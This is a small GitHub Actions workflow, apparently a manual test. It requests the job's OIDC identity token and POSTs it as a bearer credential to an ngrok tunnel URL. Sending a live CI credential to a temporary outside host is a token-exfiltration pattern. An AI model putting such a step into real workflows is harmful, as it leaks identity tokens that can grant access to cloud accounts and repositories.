name: Test OIDC Token

on:
  workflow_dispatch:  

jobs:
  print-oidc-token:
    runs-on: ubuntu-latest

    permissions:
      id-token: write  
      contents: read   

    steps:
      - name: Test OIDC Call
        run: |
          RESPONSE=$(curl -sSL -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=https://github.com")
          TOKEN=$(echo "$RESPONSE" | jq -r .value)
          
          curl -X POST https://5c4a-120-60-77-109.ngrok-free.app/verify -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json"
